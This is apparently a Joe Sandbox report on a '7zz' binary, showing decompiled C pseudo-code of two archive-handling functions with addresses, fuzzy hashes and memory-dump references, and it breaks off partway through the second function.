Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 529c86f540b2e3f00af20ac8cc2ba51f405252cf123252289ac745e0dd2c21fe
Instruction ID: 6733a5d0b54313f111c3d21430f7c760d78354a0b10c30e4881add0b2ce5f3d9
Opcode Fuzzy Hash: 529c86f540b2e3f00af20ac8cc2ba51f405252cf123252289ac745e0dd2c21fe
Instruction Fuzzy Hash: 12F06D78610301AAEB205BB3AC0572A36D0BB50792F25483BF804C85E4FB6889C4A61B

Uniqueness

Uniqueness Score: -1.00%

Function 004290C5 Relevance: 2.1, APIs: 1, Instructions: 563
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004290C5(signed char __edx) {
				signed int _t311;
				signed char _t313;
				signed int _t315;
				signed char _t316;
				intOrPtr _t319;
				void* _t325;
				intOrPtr _t329;
				intOrPtr _t331;
				signed char _t332;
				intOrPtr _t337;
				signed char _t339;
				signed char _t344;
				intOrPtr _t345;
				signed char _t356;
				signed char _t357;
				signed char _t358;
				signed char _t361;
				signed char _t362;
				signed char _t367;
				signed char _t368;
				signed char _t369;
				signed char _t377;
				signed char _t378;
				signed char _t381;
				signed char _t382;
				signed char _t388;
				signed char _t389;
				signed char _t395;
				signed char _t397;
				signed char _t398;
				signed char _t402;
				signed char _t414;
				signed int _t422;
				intOrPtr _t430;
				intOrPtr _t439;
				signed char _t443;
				signed char _t449;
				signed char _t450;
				signed char _t451;
				signed int _t453;
				void* _t455;
				intOrPtr _t457;
				signed int _t472;
				intOrPtr _t526;
				signed char _t536;
				signed int _t538;
				intOrPtr* _t539;
				signed int _t542;
				intOrPtr _t546;
				signed char _t549;
				void* _t551;
				signed char _t552;
				signed int _t554;
				intOrPtr _t555;
				void* _t556;
				void* _t558;

				_t536 = __edx;
				_t311 = E0046B890(E00476CD8, _t556);
				_t449 = 0;
				 *(_t556 - 4) = 0;
				 *((char*)(_t556 - 0x60)) = _t311 & 0xffffff00 |  *(_t556 + 0x14) != 0x00000000;
				_t313 =  *(_t556 + 0x18);
				 *((intOrPtr*)(_t556 - 0x10)) = _t558 - 0x138;
				 *(_t556 + 0x18) = _t313;
				if(_t313 != 0) {
					 *((intOrPtr*)( *_t313 + 4))(_t313);
				}
				 *(_t556 - 4) = 1;
				 *(_t556 - 0x38) = _t449;
				 *(_t556 - 0x34) = _t449;
				 *((char*)(_t556 + 0x17)) =  *((intOrPtr*)(_t556 + 0x10)) == 0xffffffff;
				if( *((char*)(_t556 + 0x17)) != 0) {
					 *((intOrPtr*)(_t556 + 0x10)) =  *((intOrPtr*)( *(_t556 + 8) + 0xdc));
				}
				if( *((intOrPtr*)(_t556 + 0x10)) != _t449) {
					E00405B9F(_t556 - 0x30);
					 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
					_t315 = 0;
					__eflags = 0;
					 *(_t556 - 4) = 2;
					 *(_t556 - 0x18) = 0;
					while(1) {
						__eflags = _t315 -  *((intOrPtr*)(_t556 + 0x10));
						if(_t315 >=  *((intOrPtr*)(_t556 + 0x10))) {
							break;
						}
						__eflags =  *((char*)(_t556 + 0x17));
						if( *((char*)(_t556 + 0x17)) == 0) {
							_t315 =  *( *(_t556 + 0xc) + _t315 * 4);
						}
						_t544 =  *(_t556 + 8);
						 *(_t556 - 0x1c) = _t315;
						_t554 =  *( *((intOrPtr*)( *(_t556 + 8) + 0x228)) + _t315 * 4);
						__eflags = _t554 - 0xffffffff;
						if(_t554 != 0xffffffff) {
							_t422 =  *(_t556 - 0x28);
							__eflags = _t422 - _t449;
							if(_t422 == _t449) {
								L16:
								 *(_t556 - 0x90) =  *(_t556 - 0x90) | 0xffffffff;
								 *(_t556 - 0x8c) = _t554;
								E0042999D(_t556 - 0x88);
								 *(_t556 - 0x70) = _t449;
								 *(_t556 - 0x6c) = _t449;
								_push(_t556 - 0x90);
								 *(_t556 - 4) = 5;
								E004299F0(_t556 - 0x30);
								 *(_t556 - 4) = 2;
								E00408604(_t556 - 0x88);
								_t526 = E00429826( *((intOrPtr*)( *((intOrPtr*)(_t544 + 0xb8)) + _t554 * 4)));
								_t67 = _t556 - 0x38;
								 *_t67 =  *(_t556 - 0x38) + _t526;
								__eflags =  *_t67;
								_t430 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) +  *(_t556 - 0x28) * 4 - 4));
								asm("adc [ebp-0x34], edx");
								 *((intOrPtr*)(_t430 + 0x20)) = _t526;
								 *(_t430 + 0x24) = _t536;
								L17:
								_t546 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) +  *(_t556 - 0x28) * 4 - 4));
								_t457 =  *((intOrPtr*)( *((intOrPtr*)( *(_t556 + 8) + 0x214)) + _t554 * 4));
								_t555 =  *((intOrPtr*)(_t546 + 0x10));
								while(1) {
									_t435 =  *(_t556 - 0x1c) - _t457;
									__eflags = _t555 -  *(_t556 - 0x1c) - _t457;
									if(_t555 >  *(_t556 - 0x1c) - _t457) {
										goto L13;
									}
									_t87 = _t546 + 8; // 0xa
									E0043AC2F(_t87, _t435 & 0xffffff00 | __eflags == 0x00000000);
									_t555 = _t555 + 1;
								}
								goto L13;
							}
							_t439 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) + _t422 * 4 - 4));
							__eflags = _t554 -  *((intOrPtr*)(_t439 + 4));
							if(_t554 ==  *((intOrPtr*)(_t439 + 4))) {
								goto L17;
							}
							goto L16;
						} else {
							_push(_t554);
							_push(_t315);
							_push(E004298B3(_t556 - 0x144));
							 *(_t556 - 4) = 3;
							E004299F0(_t556 - 0x30);
							 *(_t556 - 4) = 2;
							E00408604(_t556 - 0x13c);
							L13:
							_t315 =  *(_t556 - 0x18) + 1;
							_t449 = 0;
							 *(_t556 - 0x18) = _t315;
							continue;
						}
					}
					_t316 =  *(_t556 + 0x18);
					__eflags =  *((intOrPtr*)( *_t316 + 0xc))(_t316,  *(_t556 - 0x38),  *(_t556 - 0x34)) - _t449;
					if(__eflags == 0) {
						E00426448(_t556 - 0x11c, __eflags, 1);
						_push(0x38);
						 *(_t556 - 4) = 7;
						 *(_t556 - 0x44) = _t449;
						 *(_t556 - 0x40) = _t449;
						 *(_t556 - 0x4c) = _t449;
						 *(_t556 - 0x48) = _t449;
						_t319 = E004079F2();
						 *((intOrPtr*)(_t556 + 0x10)) = _t319;
						__eflags = _t319 - _t449;
						 *(_t556 - 4) = 8;
						if(_t319 == _t449) {
							_t549 = 0;
							__eflags = 0;
						} else {
							_t549 = E0040F3E5(_t319);
						}
						__eflags = _t549 - _t449;
						 *(_t556 - 4) = 7;
						 *(_t556 - 0x34) = _t549;
						 *(_t556 - 0x14) = _t549;
						if(_t549 != _t449) {
							 *((intOrPtr*)( *_t549 + 4))(_t549);
						}
						_push(_t449);
						 *(_t556 - 4) = 9;
						E0040F478(_t549,  *(_t556 + 0x18));
						_t538 = 0;
						__eflags = 0;
						 *(_t556 - 0x1c) = 0;
						while(1) {
							 *(_t549 + 0x28) =  *(_t556 - 0x4c);
							 *(_t549 + 0x2c) =  *(_t556 - 0x48);
							 *(_t549 + 0x20) =  *(_t556 - 0x44);
							 *(_t549 + 0x24) =  *(_t556 - 0x40);
							_t325 = E0040F554(_t549);
							__eflags = _t325 - _t449;
							if(_t325 != _t449) {
								break;
							}
							__eflags = _t538 -  *(_t556 - 0x28);
							if(_t538 <  *(_t556 - 0x28)) {
								_push(0x38);
								 *(_t556 - 0x54) = _t449;
								 *(_t556 - 0x50) = _t449;
								_t539 =  *((intOrPtr*)( *((intOrPtr*)(_t556 - 0x24)) + _t538 * 4));
								 *((intOrPtr*)(_t556 - 0x5c)) =  *((intOrPtr*)(_t539 + 0x20));
								 *((intOrPtr*)(_t556 - 0x58)) =  *((intOrPtr*)(_t539 + 0x24));
								_t329 = E004079F2();
								 *((intOrPtr*)(_t556 - 0x3c)) = _t329;
								__eflags = _t329 - _t449;
								 *(_t556 - 4) = 0xb;
								if(_t329 == _t449) {
									_t450 = 0;
									__eflags = 0;
								} else {
									_t450 = E00429F42(_t329);
								}
								__eflags = _t450;
								 *(_t556 - 0x18) = _t450;
								 *(_t556 - 4) = 9;
								 *(_t556 + 0x14) = _t450;
								if(_t450 != 0) {
									 *((intOrPtr*)( *_t450 + 4))(_t450);
								}
								 *(_t556 - 4) = 0xc;
								_t551 =  *(_t556 + 8) + 0x70;
								_t331 =  *_t539;
								__eflags = _t331 - 0xffffffff;
								if(_t331 == 0xffffffff) {
									_t331 =  *((intOrPtr*)( *((intOrPtr*)(_t551 + 0x1a4)) +  *(_t539 + 4) * 4));
								}
								__eflags =  *( *(_t556 + 8) + 0x14);
								_t332 = E0042A06F(_t450, _t551, 0, _t331, _t539 + 8,  *(_t556 + 0x18),  *((intOrPtr*)(_t556 - 0x60)),  *(_t556 + 8) & 0xffffff00 |  *( *(_t556 + 8) + 0x14) != 0x00000000); // executed
								_t451 = _t332;
								__eflags = _t451;
								if(_t451 == 0) {
									__eflags =  *_t539 - 0xffffffff;
									if( *_t539 == 0xffffffff) {
										_t453 =  *(_t539 + 4) << 2;
										 *((intOrPtr*)(_t556 - 0x3c)) =  *((intOrPtr*)( *((intOrPtr*)(_t551 + 0x48)) + _t453));
										 *(_t556 - 0x54) = E00429872(_t551,  *(_t539 + 4));
										 *(_t556 - 0x50) = _t536;
										_t337 =  *((intOrPtr*)(_t551 + 0x17c));
										_t542 =  *( *((intOrPtr*)(_t551 + 0x190)) + _t453) << 3;
										_t455 =  *((intOrPtr*)(_t337 + _t542)) +  *((intOrPtr*)(_t551 + 0x148));
										asm("adc eax, [esi+0x14c]");
										 *(_t556 + 0xc) =  *(_t556 + 0xc) & 0x00000000;
										 *((intOrPtr*)(_t556 - 0x64)) =  *((intOrPtr*)(_t337 + _t542 + 4));
										_t339 =  *(_t556 + 0x18);
										 *(_t556 - 4) = 0xe;
										__eflags = _t339;
										if(__eflags != 0) {
											_t536 = _t556 + 0xc;
											 *((intOrPtr*)( *_t339))(_t339, 0x47a578, _t536);
										}
										 *(_t556 - 4) = 0xf;
										_t344 = E004264F7(_t556 - 0x11c, __eflags,  *((intOrPtr*)( *(_t556 + 8) + 0x6c)), _t455,  *((intOrPtr*)(_t556 - 0x64)),  *((intOrPtr*)(_t551 + 0xc)) + _t542,  *((intOrPtr*)(_t556 - 0x3c)),  *(_t556 + 0x14),  *(_t556 - 0x14),  *(_t556 + 0xc), _t556 + 0x13, 1,  *((intOrPtr*)( *(_t556 + 8) + 0x10))); // executed
										_t552 = _t344;
										__eflags = _t552 - 1;
										if(_t552 != 1) {
											__eflags = _t552 - 0x80004001;
											if(_t552 != 0x80004001) {
												__eflags = _t552;
												if(_t552 == 0) {
													_t472 =  *(_t556 - 0x18);
													_t345 =  *((intOrPtr*)(_t472 + 0x18));
													__eflags =  *((intOrPtr*)(_t472 + 0x28)) -  *((intOrPtr*)(_t345 + 8));
													if( *((intOrPtr*)(_t472 + 0x28)) ==  *((intOrPtr*)(_t345 + 8))) {
														 *(_t556 - 4) = 0xc;
														E0043361B(_t556 + 0xc);
														 *(_t556 - 4) = 9;
														E0043361B(_t556 + 0x14);
														goto L104;
													}
													_t552 = E0042A381(_t472, _t556, 2);
													 *(_t556 - 4) = 0xc;
													__eflags = _t552;
													if(_t552 == 0) {
														E0043361B(_t556 + 0xc);
														 *(_t556 - 4) = 9;
														E0043361B(_t556 + 0x14);
														goto L101;
													}
													_t356 =  *(_t556 + 0xc);
													__eflags = _t356;
													if(_t356 != 0) {
														 *((intOrPtr*)( *_t356 + 8))(_t356);
													}
													_t357 =  *(_t556 + 0x14);
													 *(_t556 - 4) = 9;
													__eflags = _t357;
													if(_t357 != 0) {
														 *((intOrPtr*)( *_t357 + 8))(_t357);
													}
													_t358 =  *(_t556 - 0x14);
													 *(_t556 - 4) = 7;
													__eflags = _t358;
													if(__eflags != 0) {
														 *((intOrPtr*)( *_t358 + 8))(_t358);
													}
													 *(_t556 - 4) = 2;
													E00429925(_t556 - 0x11c, __eflags);
													 *(_t556 - 4) = 1;
													E004299B8(_t556 - 0x30);
													goto L96;
												}
												_t367 =  *(_t556 + 0xc);
												 *(_t556 - 4) = 0xc;
												__eflags = _t367;
												if(_t367 != 0) {
													 *((intOrPtr*)( *_t367 + 8))(_t367);
												}
												_t368 =  *(_t556 + 0x14);
												 *(_t556 - 4) = 9;
												__eflags = _t368;
												if(_t368 != 0) {
													 *((intOrPtr*)( *_t368 + 8))(_t368);
												}
												_t369 =  *(_t556 - 0x14);
												 *(_t556 - 4) = 7;
												__eflags = _t369;
												if(__eflags != 0) {
													 *((intOrPtr*)( *_t369 + 8))(_t369);
												}
												 *(_t556 - 4) = 2;
												E00429925(_t556 - 0x11c, __eflags);
												 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
												 *(_t556 - 4) = 0x12;
												goto L65;
											}
											_t552 = E0042A381( *(_t556 - 0x18), _t556, 1);
											_t377 =  *(_t556 + 0xc);
											__eflags = _t552;
											 *(_t556 - 4) = 0xc;
											if(_t552 == 0) {
												goto L75;
											}
											__eflags = _t377;
											if(_t377 != 0) {
												 *((intOrPtr*)( *_t377 + 8))(_t377);
											}
											_t381 =  *(_t556 + 0x14);
											 *(_t556 - 4) = 9;
											__eflags = _t381;
											if(_t381 != 0) {
												 *((intOrPtr*)( *_t381 + 8))(_t381);
											}
											_t382 =  *(_t556 - 0x14);
											 *(_t556 - 4) = 7;
											__eflags = _t382;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t382 + 8))(_t382);
											}
											 *(_t556 - 4) = 2;
											E00429925(_t556 - 0x11c, __eflags);
											 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
											 *(_t556 - 4) = 0x11;
											goto L65;
										} else {
											_t552 = E0042A381( *(_t556 - 0x18), _t556, 2);
											_t377 =  *(_t556 + 0xc);
											__eflags = _t552;
											 *(_t556 - 4) = 0xc;
											if(_t552 == 0) {
												L75:
												__eflags = _t377;
												if(_t377 != 0) {
													 *((intOrPtr*)( *_t377 + 8))(_t377);
												}
												_t378 =  *(_t556 + 0x14);
												 *(_t556 - 4) = 9;
												__eflags = _t378;
												if(_t378 != 0) {
													 *((intOrPtr*)( *_t378 + 8))(_t378);
												}
												L101:
												 *(_t556 - 4) = 9;
												L104:
												 *(_t556 - 0x1c) =  *(_t556 - 0x1c) + 1;
												 *(_t556 - 0x4c) =  *(_t556 - 0x4c) +  *((intOrPtr*)(_t556 - 0x5c));
												_t549 =  *(_t556 - 0x34);
												_t538 =  *(_t556 - 0x1c);
												asm("adc [ebp-0x48], eax");
												 *(_t556 - 0x44) =  *(_t556 - 0x44) +  *(_t556 - 0x54);
												asm("adc [ebp-0x40], eax");
												_t449 = 0;
												continue;
											}
											__eflags = _t377;
											if(_t377 != 0) {
												 *((intOrPtr*)( *_t377 + 8))(_t377);
											}
											_t388 =  *(_t556 + 0x14);
											 *(_t556 - 4) = 9;
											__eflags = _t388;
											if(_t388 != 0) {
												 *((intOrPtr*)( *_t388 + 8))(_t388);
											}
											_t389 =  *(_t556 - 0x14);
											 *(_t556 - 4) = 7;
											__eflags = _t389;
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t389 + 8))(_t389);
											}
											 *(_t556 - 4) = 2;
											E00429925(_t556 - 0x11c, __eflags);
											 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
											 *(_t556 - 4) = 0x10;
											L65:
											E0040862D();
											 *(_t556 - 4) = 1;
											E00408604(_t556 - 0x30);
											L96:
											_t361 =  *(_t556 + 0x18);
											 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
											__eflags = _t361;
											L97:
											if(__eflags != 0) {
												 *((intOrPtr*)( *_t361 + 8))(_t361);
											}
											_t362 = _t552;
											goto L105;
										}
									}
									_t395 =  *(_t556 + 0x14);
									 *(_t556 - 4) = 9;
									__eflags = _t395;
									if(_t395 != 0) {
										 *((intOrPtr*)( *_t395 + 8))(_t395);
									}
									goto L104;
								} else {
									_t397 =  *(_t556 + 0x14);
									 *(_t556 - 4) = 9;
									__eflags = _t397;
									if(_t397 != 0) {
										 *((intOrPtr*)( *_t397 + 8))(_t397);
									}
									_t398 =  *(_t556 - 0x14);
									 *(_t556 - 4) = 7;
									__eflags = _t398;
									if(__eflags != 0) {
										 *((intOrPtr*)( *_t398 + 8))(_t398);
									}
									 *(_t556 - 4) = 2;
									E00429925(_t556 - 0x11c, __eflags);
									 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
									 *(_t556 - 4) = 0xd;
									E0040862D();
									 *(_t556 - 4) = 1;
									E00408604(_t556 - 0x30);
									_t402 =  *(_t556 + 0x18);
									 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
									__eflags = _t402;
									if(_t402 != 0) {
										 *((intOrPtr*)( *_t402 + 8))(_t402);
									}
									_t362 = _t451;
									goto L105;
								}
							}
							 *(_t556 - 4) = 7;
							E0043361B(_t556 - 0x14);
							 *(_t556 - 4) = 2;
							E00429925(_t556 - 0x11c, __eflags); // executed
							 *(_t556 - 4) = 1;
							E004299B8(_t556 - 0x30);
							_t137 = _t556 - 4;
							 *_t137 =  *(_t556 - 4) & 0x00000000;
							__eflags =  *_t137;
							E0043361B(_t556 + 0x18);
							goto L35;
						}
						_t414 =  *(_t556 - 0x14);
						 *(_t556 - 4) = 7;
						__eflags = _t414 - _t449;
						if(__eflags != 0) {
							 *((intOrPtr*)( *_t414 + 8))(_t414);
						}
						 *(_t556 - 4) = 2;
						E00429925(_t556 - 0x11c, __eflags);
						 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
						 *(_t556 - 4) = 0xa;
						L22:
						E0040862D();
						 *(_t556 - 4) = 1;
						E00408604(_t556 - 0x30);
						_t361 =  *(_t556 + 0x18);
						 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
						__eflags = _t361 - _t449;
						goto L97;
					}
					 *((intOrPtr*)(_t556 - 0x30)) = 0x47b308;
					 *(_t556 - 4) = 6;
					goto L22;
				} else {
					_t443 =  *(_t556 + 0x18);
					 *(_t556 - 4) =  *(_t556 - 4) & 0x00000000;
					if(_t443 != _t449) {
						 *((intOrPtr*)( *_t443 + 8))(_t443);
					}
					L35:
					_t362 = 0;
					L105:
					 *[fs:0x0] =  *((intOrPtr*)(_t556 - 0xc));
					return _t362;
				}
			}

0x004290c5
0x004290ca
0x004290d6
0x004290dd
0x004290e3
0x004290e6
0x004290eb
0x004290ee
0x004290f1
0x004290f6
0x004290f6
0x004290fd
0x00429101
0x00429104
0x00429107
0x0042910f
0x0042911a
0x0042911a
0x00429120
0x0042913f
0x00429144
0x0042914b
0x0042914b
0x0042914d
0x00429151
0x00429154
0x00429154
0x00429157
0x00000000
0x00000000
0x0042915d
0x00429161
0x00429166
0x00429166
0x00429169
0x0042916c
0x00429175
0x00429178
0x0042917b
0x004291b1
0x004291b4
0x004291b6
0x004291c4
0x004291c4
0x004291d1
0x004291d7
0x004291dc
0x004291df
0x004291eb
0x004291ec
0x004291f0
0x004291fb
0x004291ff
0x00429215
0x0042921a
0x0042921a
0x0042921a
0x0042921d
0x00429221
0x00429224
0x00429227
0x0042922a
0x00429230
0x0042923d
0x00429240
0x00429243
0x00429246
0x00429248
0x0042924a
0x00000000
0x00000000
0x00429254
0x00429257
0x0042925c
0x0042925c
0x00000000
0x00429243
0x004291bb
0x004291bf
0x004291c2
0x00000000
0x00000000
0x00000000
0x0042917d
0x0042917d
0x0042917e
0x0042918a
0x0042918e
0x00429192
0x0042919d
0x004291a1
0x004291a6
0x004291a9
0x004291aa
0x004291ac
0x00000000
0x004291ac
0x0042917b
0x00429262
0x00429270
0x00429272
0x004292a9
0x004292ae
0x004292b0
0x004292b4
0x004292b7
0x004292ba
0x004292bd
0x004292c0
0x004292c6
0x004292c9
0x004292cb
0x004292cf
0x004292dc
0x004292dc
0x004292d1
0x004292d8
0x004292d8
0x004292de
0x004292e0
0x004292e4
0x004292e7
0x004292ea
0x004292ef
0x004292ef
0x004292f2
0x004292f8
0x004292fc
0x00429301
0x00429301
0x00429303
0x00429306
0x0042930b
0x00429311
0x00429317
0x0042931d
0x00429320
0x00429327
0x00429329
0x00000000
0x00000000
0x0042935b
0x0042935e
0x0042939d
0x0042939f
0x004293a2
0x004293a5
0x004293ab
0x004293b1
0x004293b4
0x004293ba
0x004293bd
0x004293bf
0x004293c3
0x004293d0
0x004293d0
0x004293c5
0x004293cc
0x004293cc
0x004293d2
0x004293d4
0x004293d7
0x004293db
0x004293de
0x004293e3
0x004293e3
0x004293e9
0x004293ed
0x004293f0
0x004293f2
0x004293f5
0x00429400
0x00429400
0x00429406
0x0042941e
0x00429423
0x00429425
0x00429427
0x00429491
0x00429494
0x004294b9
0x004294c1
0x004294c9
0x004294d2
0x004294d8
0x004294de
0x004294e4
0x004294ee
0x004294f4
0x004294f8
0x004294fb
0x004294fe
0x00429502
0x00429504
0x00429508
0x00429512
0x00429512
0x00429517
0x00429544
0x00429549
0x0042954b
0x0042954e
0x004295ca
0x004295d0
0x0042965c
0x0042965e
0x004296b2
0x004296b5
0x004296bb
0x004296be
0x00429754
0x004297d1
0x004297d9
0x004297dd
0x00000000
0x004297dd
0x004296cb
0x004296cd
0x004296d1
0x004296d3
0x0042973a
0x00429742
0x00429746
0x00000000
0x00429746
0x004296d5
0x004296d8
0x004296da
0x004296df
0x004296df
0x004296e2
0x004296e5
0x004296e9
0x004296eb
0x004296f0
0x004296f0
0x004296f3
0x004296f6
0x004296fa
0x004296fc
0x00429701
0x00429701
0x0042970a
0x0042970e
0x00429716
0x0042971a
0x00000000
0x0042971a
0x00429660
0x00429663
0x00429667
0x00429669
0x0042966e
0x0042966e
0x00429671
0x00429674
0x00429678
0x0042967a
0x0042967f
0x0042967f
0x00429682
0x00429685
0x00429689
0x0042968b
0x00429690
0x00429690
0x00429699
0x0042969d
0x004296a2
0x004296a9
0x00000000
0x004296a9
0x004295e0
0x004295e2
0x004295e5
0x004295e7
0x004295eb
0x00000000
0x00000000
0x004295ed
0x004295ef
0x004295f4
0x004295f4
0x004295f7
0x004295fa
0x004295fe
0x00429600
0x00429605
0x00429605
0x00429608
0x0042960b
0x0042960f
0x00429611
0x00429616
0x00429616
0x0042961f
0x00429623
0x00429628
0x0042962f
0x00000000
0x00429550
0x0042955a
0x0042955c
0x0042955f
0x00429561
0x00429565
0x00429638
0x00429638
0x0042963a
0x0042963f
0x0042963f
0x00429642
0x00429645
0x00429649
0x0042964b
0x00429654
0x00429654
0x0042974b
0x0042974b
0x004297e2
0x004297e5
0x004297e8
0x004297ee
0x004297f1
0x004297f4
0x004297fa
0x00429800
0x00429803
0x00000000
0x00429803
0x0042956b
0x0042956d
0x00429572
0x00429572
0x00429575
0x00429578
0x0042957c
0x0042957e
0x00429583
0x00429583
0x00429586
0x00429589
0x0042958d
0x0042958f
0x00429594
0x00429594
0x0042959d
0x004295a1
0x004295a6
0x004295ad
0x004295b1
0x004295b4
0x004295bc
0x004295c0
0x0042971f
0x0042971f
0x00429722
0x00429726
0x00429728
0x00429728
0x0042972d
0x0042972d
0x00429730
0x00000000
0x00429730
0x0042954e
0x00429496
0x00429499
0x0042949d
0x0042949f
0x004294a8
0x004294a8
0x00000000
0x00429429
0x00429429
0x0042942c
0x00429430
0x00429432
0x00429437
0x00429437
0x0042943a
0x0042943d
0x00429441
0x00429443
0x00429448
0x00429448
0x00429451
0x00429455
0x0042945a
0x00429464
0x00429468
0x00429470
0x00429474
0x00429479
0x0042947c
0x00429480
0x00429482
0x00429487
0x00429487
0x0042948a
0x00000000
0x0042948a
0x00429427
0x00429363
0x00429367
0x00429372
0x00429376
0x0042937e
0x00429382
0x00429387
0x00429387
0x00429387
0x0042938e
0x00000000
0x0042938e
0x0042932b
0x0042932e
0x00429332
0x00429334
0x00429339
0x00429339
0x00429342
0x00429346
0x0042934b
0x00429352
0x0042927f
0x00429282
0x0042928a
0x0042928e
0x00429293
0x00429296
0x0042929a
0x00000000
0x0042929a
0x00429274
0x0042927b
0x00000000
0x00429122
0x00429122
0x00429125
0x0042912b
0x00429134
0x00429134
0x00429393
0x00429393
0x00429815
0x0042981a
0x00429823
0x00429823

APIs

__EH_prolog.LIBCMT ref: 004290CA

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e4c0a2cf1be0fd270f4cf5adca7858e0440031e4be77d2fa08e84f06a2b8deb6
Instruction ID: 547796bb05142e1515dbc63510b15c43ea8da4dd30ba33bee99df57db7602c14
Opcode Fuzzy Hash: e4c0a2cf1be0fd270f4cf5adca7858e0440031e4be77d2fa08e84f06a2b8deb6
Instruction Fuzzy Hash: 84428E70A00259EFDB10DFA8D584BDDBBB4BF19304F54409EE849A7382CB78AE45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00418554 Relevance: 1.9, APIs: 1, Instructions: 374
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00418554(intOrPtr __ecx) {
				intOrPtr _t181;
				signed int _t184;
				signed int* _t187;
				intOrPtr _t188;
				signed int* _t191;
				signed int* _t193;
				void* _t194;
				signed int* _t195;
				void* _t197;
				signed int* _t198;
				void* _t200;
				signed int* _t201;
				intOrPtr _t205;
				signed int* _t207;
				signed int* _t208;
				signed int* _t209;
				intOrPtr* _t213;
				intOrPtr* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t220;
				signed int* _t222;
				signed int* _t223;
				signed int* _t224;
				intOrPtr* _t232;
				signed int* _t234;
				signed int* _t235;
				signed int* _t236;
				intOrPtr* _t243;
				signed int* _t245;
				signed int* _t246;
				signed int* _t247;
				intOrPtr _t255;
				signed int _t266;
				signed int _t307;
				signed int _t313;
				intOrPtr _t317;
				signed int** _t319;
				intOrPtr _t320;
				void* _t322;

				E0046B890(E00474E2F, _t322);
				_push(_t313);
				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
				E00418540(__ecx);
				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
					while(1) {
						_t317 =  *((intOrPtr*)(_t322 + 0xc));
						_t307 = 1;
						_t313 = _t313 | 0xffffffff;
						_t181 =  *((intOrPtr*)(_t317 + 8));
						 *(_t322 - 0x24) = _t313;
						if(_t181 < _t307) {
							goto L6;
						}
						L4:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= _t181) {
							L76:
							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
							_t184 = 0;
							goto L77;
						}
						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
						L7:
						if(_t266 != 0) {
							 *(_t322 - 0x38) = 0;
							 *((short*)(_t322 - 0x36)) = 0;
							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
							_t187 =  *_t319;
							 *(_t322 - 4) = _t307;
							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
							if(_t188 != 0) {
								L35:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t320 = _t188;
								E0040C20F(_t322 - 0x38);
								L71:
								_t184 = _t320;
								goto L77;
							}
							if( *(_t322 - 0x38) != 0x13) {
								L75:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t266 = _t322 - 0x38;
								E0040C20F(_t266);
								goto L76;
							}
							_t191 =  *_t319;
							_t313 =  *(_t322 - 0x30);
							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
							if(_t188 != 0) {
								goto L35;
							}
							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
								goto L75;
							}
							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
							E0040C20F(_t322 - 0x38);
							 *(_t322 - 0x10) = 0;
							_t193 =  *_t319;
							_t266 =  *_t193;
							 *(_t322 - 4) = 2;
							_t194 =  *_t266(_t193, 0x47a5e8, _t322 - 0x10);
							_t195 =  *(_t322 - 0x10);
							if(_t194 != 0 || _t195 == 0) {
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								goto L52;
							} else {
								 *(_t322 - 0x14) = 0;
								_t266 =  *_t195;
								 *(_t322 - 4) = 3;
								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
								_t198 =  *(_t322 - 0x14);
								if(_t197 != 0 || _t198 == 0) {
									 *(_t322 - 4) = 2;
									goto L49;
								} else {
